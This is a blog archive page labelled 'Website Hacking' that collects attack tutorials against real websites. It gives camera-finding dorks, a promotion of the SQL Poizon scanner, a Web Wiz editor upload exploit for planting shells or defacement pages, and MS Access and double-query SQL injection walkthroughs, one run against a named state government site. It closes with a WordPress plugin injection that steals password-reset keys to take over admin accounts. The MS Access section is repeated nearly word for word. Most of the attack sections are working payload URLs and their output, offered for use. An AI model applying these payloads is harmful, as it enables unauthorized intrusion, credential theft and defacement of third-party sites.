View Hidden Password in Browser
Showing posts with label Website Hacking. Show all posts
Showing posts with label Website Hacking. Show all posts
Live Cameras Around The World
- inurl:”CgiStart?page=”
- inurl:/view.shtml* intitle:”Live View / — AXIS
- inurl:view/view.shtml
- inurl:ViewerFrame?Mode=
- inurl:ViewerFrame?Mode=Refresh
- inurl:axis-cgi/jpg
You can Play Mp3 Movie Directly On Chrome
Do you Know you can play Mp3, Movie directly on Chrome Browser, Just drag files in Chrome Window
Check a website is safe
Check a website is safe to visit or Not by changing red letter by website domain name
http://www.google.com/safebrowsing/diagnostic?site=PattakhaZOne.blogspot.com
5000 Fresh Google Dorks List for SQL injection
Latest Google Dorks For Hacking We call them 'googledorks': Inept or foolish people as revealed by Google. Whatever you call these fools, you've found the center of the Google Hacking. I need to see if a site I am testing is vulnerable to any of the multiple Google dorks that are available at sites like this and this
Download SQL Poizon v1.1 - The Exploit Scanner Free Full
Download SQL Poizon v1.1 - The Exploit Scanner Free Full
SQL Poizon is a tool that is used to find and evaluate sql vulnerable websites.
Sql Poizon tool includes php , asp , rfi , lfi dorks and using this tools you can find vulnerable sites like sql vulnerable sites and you can also find vulnerable sites by country and you can hack sql vulnerable sites using Sql Poizon tool and you can also browse the sites using this tool.
Procedure for using SQL Poizon:
1) First download SQL Poizon software from the download link below.
2) Run Sql Poizon v1.1
3) Once you run it, you have to select a dork. After you have selected the desired dork press Scan and it'll show the results in the Result Panel.
4) Now you have to send the results to the Sqli Crawler. You can do this by right clicking in the Results Panel and select "Send to Sqli Crawler -> All"
5) Now the Sqli Cralwer tab will open and all you have to do is click Crawl and it will check if the website is vulnerable to SQL Injection or not.
6) Now you have to press Export Results and place it somewhere where you can open it later for further exploitation.
Screenshot :
CLICK HERE TO DOWNLOAD
How to Find Vulnerable Website In Urdu
Ap ne Vulnerable site k bare me Para Hoga K wo Hack Ho jati Hian Q k Un site Ko sahi Tarikay se Update ya Define Nai Kia Jata Hy To IS K Liay Hum SQL Poizon Use Kren Ge Jo K me Ap ko Downlaod Krny Ko Don ga
CLICK HERE TO DOWNLOAD
Jaie Gi Akhir Me Ye Result Aie ga Jo Website Vulnerable Hon gi Un Pe non-clear Ka Nishan Aie Ga ....Nechay Rable LInk Me Sab Vulnerbale Site Hain
Un kO Ap Asani Se Hack Kr Sakty Hian
CLICK HERE TO DOWNLOAD
Ab Ap ne Khona Hy Isy Or Run Kren Ab Ap ne SQL DOrk Pe Click Krna Hy Or Yahan Ap ne PHp YA KOi B Dork Select Krna Hy Jese Me ne PHP Select Kri Hy ,Is K Bad AP Ne Koi B Dork URL Select Krna Hy Jese Me Ne Index.php Select Kri Hy
Ab 3rd Step Pe ap Ne Scan K Button Pe CLick Krna Hy Or Scan Start Ho JAie Ga Uese Me ne Kia . Watch Windows Pe AP KA YE AIe Ga Search Completed.
Url's Found: 64 ya 34 ya Kuch B
Ab ap Ne Nechy Result Panel Pe Koi Ake Website Pe Tick Krna Hy Or Us pe Right Click Krna Hy OR Send To SQLI Crawler
Or Phr All Pe click Krna Hy AB Ap KA Crawl Panel Khul Jaie Ga
Yahan AP ne Crawl Pe CLick Krna Hy To In Websites Ki Crawling Shuru Ho
Jaie Gi Akhir Me Ye Result Aie ga Jo Website Vulnerable Hon gi Un Pe non-clear Ka Nishan Aie Ga ....Nechay Rable LInk Me Sab Vulnerbale Site Hain
Un kO Ap Asani Se Hack Kr Sakty Hian
HACK Websites Using THE Web Wiz Vulnerability
Today I'm going to tell you how to hack a website using VULNERABLITY called RTE Webwiz Vulnerability.
Webwiz rich text editor HTML code is carried in the open after they are sent charCode due functioning of the page .
STEPS:
1) Goto google and type in any of these dorks:
inurl:rte/my_documents/my_files
inurl:/my_documents/my_files/
2) Open any site and replace everything after "http://site.com/" with the following exploit then press enter:
rte/RTE_popup_file_atch.asp
3) Now the site's url will look like "site.com/rte/RTE_popup_file_atch.asp "
4) Now you will be redirected here:
5) Now you can upload your shell or directly upload your deface page
6) Now when you click upload you will get the file URL in the "FILE URL" textbox...
Msacess Injection on Live site
Today Im gonna discuss MS Access Injection which is rare really n wiered too . Hardly some web still using it.
MS Access is commonly thought of as the little brother of Database engines, and not a lot of material has been published about methods used for exploiting it during a penetration test.MS Jet is often mistakenly thought of as being another name for MS Access, when in fact it is a database engine that is shipped as part of the Windows OS. MS Jet was however the core database engine used by MS Access up to version 2007. Since version 2007, MS Access has included a separate updated engine known as Access Connectivity Engine. Although MS Jet is not as complex as more advanced databases such as SQL server or Oracle, it is still commonly used by smaller web sites that want quick and easy database storage.
Note: Those table name having * infront of their name, means it can be use in query.
Access 97
Access 2000
Access 2002-2003
Access 2007
As we can see each version having some new default tables and each of them work differently .But ms access injection is real pain it does not contails schema , when we say schema that's mean we have to guess each table and column . Access also does not support.ERROR BASED INJECTION nor having global veriable like @@version . So we can guess the version by default table.
We will use the # for commenting the rest of the query instead of -- or /* .
[b]Step-1
Code:
http://house.louisiana.gov/h_reps/members.asp?id=103
Above site is vuln to sql injection let's see what error we get ?
Code:
http://house.louisiana.gov/h_reps/members.asp?id=103'
Code:
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC Microsoft Access Driver] Syntax error in string in query expression 'DISTRICTNUMBER = 103''.
/h_reps/members.asp, line 16
Step-2
Using order by to get columns.
Code:
http://house.louisiana.gov/h_reps/members.asp?id=103 order by 1# <== No error
http://house.louisiana.gov/h_reps/members.asp?id=103 order by 2# <== No error
http://house.louisiana.gov/h_reps/members.asp?id=103 order by 3# <== No error
http://house.louisiana.gov/h_reps/members.asp?id=103 order by 4# <== No error
we will do increament of 1 till we get an error :
Code:
http://house.louisiana.gov/h_reps/members.asp?id=103 order by 35# <== Error
That's mean we have total number of columns are 34 . Let's proceed with union now.
If we are not sure about data type we can proceed with Null instead of integer .
Step-3
Code:
http://house.louisiana.gov/h_reps/members.asp?id=103 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34 from MSysAccessObjects#
We have used default table name of MS Access 2000 see the list above.
Now on your screen you can see some numbers right under the page contents like 17 19 20
Step-4: Getting table
Code:
http://house.louisiana.gov/h_reps/members.asp?id=103 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34 from members#
Page load normaly that's mean we have found a valid table now let's enumerate columns .
Step-5 : Getting Columns
We will use GROUP BY and Having for example
GROUP BY tablename.column1 having 1=1#
GROUP BY tablename.coumn1,column2 having 1=1#
GROUP BY tablename.column1,column2,coumn(n).... having 1=1#
Code:
http://house.louisiana.gov/h_reps/members.asp?id=103 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34 from members group by members.id#
Page will load with out any error now lets out it in place of number of column
Code:
http://house.louisiana.gov/h_reps/members.asp?id=103 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,id,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34 from members#
we have got the following data Smile .
Code:
COMMITTEE ASSIGNMENTS
102
Now let's get next column
Code:
http://house.louisiana.gov/h_reps/members.asp?id=103 UNION SELECT 1,2,3,4,5,6,7,8,9,10,
11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34 from members group by members.id,
now having 1=1#
Page will load with out any error now lets out it in place of number of column
Code:
http://house.louisiana.gov/h_reps/members.asp?id=103 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,now,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34 from members#
we have got the following data
Introduction
MS Access is commonly thought of as the little brother of Database engines, and not a lot of material has been published about methods used for exploiting it during a penetration test.MS Jet is often mistakenly thought of as being another name for MS Access, when in fact it is a database engine that is shipped as part of the Windows OS. MS Jet was however the core database engine used by MS Access up to version 2007. Since version 2007, MS Access has included a separate updated engine known as Access Connectivity Engine. Although MS Jet is not as complex as more advanced databases such as SQL server or Oracle, it is still commonly used by smaller web sites that want quick and easy database storage.
Default Tables Used In Access
Note: Those table name having * infront of their name, means it can be use in query.
Access 97
- MSysAccessObjects *
- MSysACEs
- MSysModules
- MSysModules2 *
- MSysObjects
- MSysQueries
- MSysRelationship
Access 2000
- MSysAccessObjects *
- MSysAccessXML *
- MSysACEs
- MSysObjects
- MSysQueries
- MSysRelationships
Access 2002-2003
- MSysAccessStorage *
- MSysAccessXML *
- MSysACEs
- MSysObjects
- MSysQueries
- MSysRelationships
Access 2007
- MSysAccessStorage *
- MSysACEs
- MSysComplexColumns
- MSysComplexType_Attachment
- MSysComplexType_Decimal
- MSysComplexType_GUID
- MSysComplexType_IEEEDouble
- MSysComplexType_IEEESingle
- MSysComplexType_Long
- MSysComplexType_Short
- MSysComplexType_Text
- MSysComplexType_UnsignedByte
- MSysNavPaneGroupCategories *
- MSysNavPaneGroups *
- MSysNavPaneGroupToObjects *
- MSysNavPaneObjectIDs *
- SysObjects
- MSysQueries
- MSysRelationships
As we can see each version having some new default tables and each of them work differently .But ms access injection is real pain it does not contails schema , when we say schema that's mean we have to guess each table and column . Access also does not support.ERROR BASED INJECTION nor having global veriable like @@version . So we can guess the version by default table.
Column Enumeration and Union [b]
We will use the # for commenting the rest of the query instead of -- or /* .
[b]Step-1
Code:
http://house.louisiana.gov/h_reps/members.asp?id=103
Above site is vuln to sql injection let's see what error we get ?
Code:
http://house.louisiana.gov/h_reps/members.asp?id=103'
Code:
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC Microsoft Access Driver] Syntax error in string in query expression 'DISTRICTNUMBER = 103''.
/h_reps/members.asp, line 16
Step-2
Using order by to get columns.
Code:
http://house.louisiana.gov/h_reps/members.asp?id=103 order by 1# <== No error
http://house.louisiana.gov/h_reps/members.asp?id=103 order by 2# <== No error
http://house.louisiana.gov/h_reps/members.asp?id=103 order by 3# <== No error
http://house.louisiana.gov/h_reps/members.asp?id=103 order by 4# <== No error
we will do increament of 1 till we get an error :
Code:
http://house.louisiana.gov/h_reps/members.asp?id=103 order by 35# <== Error
That's mean we have total number of columns are 34 . Let's proceed with union now.
If we are not sure about data type we can proceed with Null instead of integer .
Step-3
Code:
http://house.louisiana.gov/h_reps/members.asp?id=103 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34 from MSysAccessObjects#
We have used default table name of MS Access 2000 see the list above.
Now on your screen you can see some numbers right under the page contents like 17 19 20
Most common tables are below [/b]
- users
- admin
- administrator
- login
- customers
- user
- members
- member
- customer
Step-4: Getting table
Code:
http://house.louisiana.gov/h_reps/members.asp?id=103 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34 from members#
Page load normaly that's mean we have found a valid table now let's enumerate columns .
Step-5 : Getting Columns
We will use GROUP BY and Having for example
GROUP BY tablename.column1 having 1=1#
GROUP BY tablename.coumn1,column2 having 1=1#
GROUP BY tablename.column1,column2,coumn(n).... having 1=1#
Code:
http://house.louisiana.gov/h_reps/members.asp?id=103 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34 from members group by members.id#
Page will load with out any error now lets out it in place of number of column
Code:
http://house.louisiana.gov/h_reps/members.asp?id=103 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,id,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34 from members#
we have got the following data Smile .
Code:
COMMITTEE ASSIGNMENTS
102
Now let's get next column
Code:
http://house.louisiana.gov/h_reps/members.asp?id=103 UNION SELECT 1,2,3,4,5,6,7,8,9,10,
11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34 from members group by members.id,
now having 1=1#
Page will load with out any error now lets out it in place of number of column
Code:
http://house.louisiana.gov/h_reps/members.asp?id=103 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,now,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34 from members#
we have got the following data
Sql injection [Double Query Error Based]
Sql injection [Double Query Error Based]
This tutorial is about how to hack a website through Sql injection Double Query Error Based
So for this first you need a vulnerable site..
ok after getting a vulnerable site as a normal you get the column counts
suppose it has 4 columns so next your command will be
Code:
www.vulnsite.com/index.php?id=-12 union select 1,2,3,4--
but when you press enter it gives error :-0
the error is
Code:
(select statement have different numbers of column)
so now what????? Angry
don't be so confused its time for using double query Sql injection
so your command will look like this:-
Code:
www.site.com/index.php?id=-12+and+(select+1+from(select count(*),concat((select+concat(version())+from+information_schema.tables+limit+0,1),floor(Rand(0)*2))a+from+information_schema.tables+group+by+a)b)
and result will look like this
Code:
"Duplicate entry '5.0.92-community-log1' for key 1"
so here '5.0.92-community-log1' is sites version.
now we have to find sites current_user so our command will be:-
Code:
www.site.com/index.php?id=-12+and+(select+1+from(select count(*),concat((select+concat(current_user())+from+information_schema.tables+limit+0,1),floor(Rand(0)*2))a+from+information_schema.tables+group+by+a)b)
result
Code:
"Duplicate entry user+1' for key 1"
ok now we will find tables by this command :-
Code:
www.site.com/index.php?id=-12+and+(select+1+from(select count(*),concat((select+concat(table_name)+from+information_schema.tables+limit+0,1),floor(Rand(0)*2))a+from+information_schema.tables+group+by+a)b)
result should be
Code:
"duplicate entry 'table_name1' for key 1'
now keep increasing the limit you can find it near
Code:
((table_name)+from+information_schema.tables+limit+0,1) )
here change the limit '0,1'to 1,1 then 2,1 until you get the error.
ok now we will find tables which contains the data so our command will be:-
Code:
www.site.com/index.php?id=-12+and+(select+1+from(select count(*),concat((select+concat(table_name)+from+information_schema.tables+where+table_schema=database()+limit+0,1),floor(Rand(0)*2))a+from+information_schema.tables+group+by+a)b)
result
Code:
"duplicate entry tablename1' for key 1"
so here again increase the limits value until you get the table like user,,admin,,login etc etc.. Tongue
ok now suppose we have table name "user" so next step is to find columns of this table our command will be:-
Code:
www.site.com/index.php?id=-12+and+(select+1+from(select count(*),concat((select+concat(column_name)+from+information_schema.columns+where+table_name=<hex value of table>+limit+0,1),floor(Rand(0)*2))a+from+information_schema.tables+group+by+a)b)
result
Code:
"Duplicate entry 'column name1' for key 1'
you can change text to hex here>> http://www.swingnote.com/tools/texttohex.php
again keep changing limits value untill you get columns like username,password etc :/
ok now we have columns username and password we need the data inside the columns so our command will be:-
Code:
www.site.com/index.php?id=-12+and+(select+1+from(select count(*),concat((select+concat(username,0x3a,password)+from+user+limit+0,1),floor(Rand(0)*2))a+from+information_schema.tables+group+by+a)b)
result
Code:
"Duplicate entry 'Admin:452875204827e1f25994a3da414587125' for key 1"
if the password is in hashes then you have to crack that hash
u can crack that hash with a site namely
Code:
http://md5decrypter.co.uk
so u can crack the hash
so u got user and pass login do wht u guyz want nd enjoy Big Grin
POSTED BY PATTAKHA MUNDA
[Tutorial] Hack WordPress site with SQL injection
Hack WordPress site with SQL injection
As requested by few of you i decided to make this small tutorial on how to hack a wordpress site that has an SQLi in plugin.
So lets begin.
I will use this 0day here by AMY hacker.
First of all we need to find a vulnerable page.
We enter this in Google:
Code:
# Dork 1 (config.php)
inurl:"/wp-content/plugins/hd-webplayer/config.php?id="
# Dork 2 (playlist.php)
inurl:"/wp-content/plugins/hd-webplayer/playlist.php?videoid="
# Dork 3 (General):
inurl:"/wp-content/plugins/hd-webplayer/"
When you found your site you need to find admin email and username.
I will be using this site for example
Code:
http://www.thefreenudecelebritysite.com/wp-content/plugins/hd-webplayer/playlist.php?videoid=3
When i add ' text disappears so it is vulnerable.
NOTE: I will not demonstrate how to SQL inject.
Now we need admin username and email.
We need to inject:
Code:
http://www.thefreenudecelebritysite.com/wp-content/plugins/hd-webplayer/playlist.php?videoid=-3 UNION SELECT 1,2,3,group_concat(user_login,0x3a,user_email,0x3b),5,6,7,8,9,10,11 FROM wp_users--
Now we have 2 users.
We pick one and copy his email.
Go to the login page of the site.
It is usually here:
Code:
http://www.site.com/wp-login.php
And press "Lost your password?"
Now you enter either username or email.
We can enter both so it doesnt matter.
I entered email.
Now when you got:
"Check your e-mail for the confirmation link."
It means that reset key is successfully sent.
Now we need to get the activation key.
Go back to the syntax you used for extracting email and username and do this:
Code:
http://www.thefreenudecelebritysite.com/wp-content/plugins/hd-webplayer/playlist.php?videoid=-3 UNION SELECT 1,2,3,group_concat(user_login,0x3a,user_email,0x3b),5,6,7,8,9,10,11 FROM wp_users--
Code:
http://www.thefreenudecelebritysite.com/wp-content/plugins/hd-webplayer/playlist.php?videoid=-3 UNION SELECT 1,2,3,group_concat(user_login,0x3a,user_activation_key,0x3b),5,6,7,8,9,10,11 FROM wp_users--
Voila!
Now we just need to reset it.
Go to:
Code:
wp-login.php?action=rp&key=resetkey&login=username
NOTE: Replace key= & login=
So my link will be:
Login with new password and shell it.
Subscribe to:
Posts (Atom)
